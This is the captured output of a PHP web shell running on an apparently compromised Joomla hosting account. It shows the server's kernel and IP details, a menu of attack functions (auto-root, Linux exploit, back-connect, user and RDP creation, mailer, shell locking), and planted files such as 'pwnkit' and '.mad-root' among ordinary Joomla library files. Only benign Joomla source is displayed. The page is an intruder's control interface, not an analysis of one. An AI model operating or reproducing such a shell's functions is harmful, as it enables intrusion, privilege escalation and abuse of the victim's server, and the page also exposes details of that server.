Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
cms /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access.php
8.56
KB
-rw-r--r--
actionsdropdown.php
5.59
KB
-rw-r--r--
batch.php
5.77
KB
-rw-r--r--
behavior.php
26.19
KB
-rw-r--r--
bootstrap.php
30.89
KB
-rw-r--r--
category.php
4.43
KB
-rw-r--r--
content.php
1.12
KB
-rw-r--r--
contentlanguage.php
1.53
KB
-rw-r--r--
date.php
1.93
KB
-rw-r--r--
dropdown.php
8.79
KB
-rw-r--r--
email.php
3.32
KB
-rw-r--r--
form.php
736
B
-rw-r--r--
formbehavior.php
4.41
KB
-rw-r--r--
grid.php
9.85
KB
-rw-r--r--
html.php
31.3
KB
-rw-r--r--
icons.php
1.52
KB
-rw-r--r--
jgrid.php
16.15
KB
-rw-r--r--
jquery.php
2.95
KB
-rw-r--r--
links.php
2.51
KB
-rw-r--r--
list.php
6.65
KB
-rw-r--r--
menu.php
8.11
KB
-rw-r--r--
number.php
1.52
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rules.php
7.89
KB
-rw-r--r--
searchtools.php
4.09
KB
-rw-r--r--
select.php
27.35
KB
-rw-r--r--
sidebar.php
3.14
KB
-rw-r--r--
sliders.php
3.83
KB
-rw-r--r--
sortablelist.php
3.16
KB
-rw-r--r--
string.php
8.93
KB
-rw-r--r--
tabs.php
2.63
KB
-rw-r--r--
tag.php
6.72
KB
-rw-r--r--
tel.php
2.15
KB
-rw-r--r--
user.php
1.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : number.php
<?php /** * @package Joomla.Libraries * @subpackage HTML * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ defined('JPATH_PLATFORM') or die; /** * HTML helper class for rendering numbers. * * @since 1.6 */ abstract class JHtmlNumber { /** * Converts bytes to more distinguishable formats such as: * kilobytes, megabytes, etc. * * By default, the proper format will automatically be chosen. * However, one of the allowed unit types may also be used instead. * * @param integer $bytes The number of bytes. * @param string $unit The type of unit to return. * @param integer $precision The number of digits to be used after the decimal place. * * @return string The number of bytes in the proper units. * * @since 1.6 */ public static function bytes($bytes, $unit = 'auto', $precision = 2) { // No explicit casting $bytes to integer here, since it might overflow // on 32-bit systems $precision = (int) $precision; if (empty($bytes)) { return 0; } $unitTypes = array('b', 'kb', 'MB', 'GB', 'TB', 'PB'); // Default automatic method. $i = floor(log($bytes, 1024)); // User supplied method: if ($unit !== 'auto' && in_array($unit, $unitTypes)) { $i = array_search($unit, $unitTypes, true); } // TODO Allow conversion of units where $bytes = '32M'. return round($bytes / pow(1024, $i), $precision) . ' ' . $unitTypes[$i]; } }
Close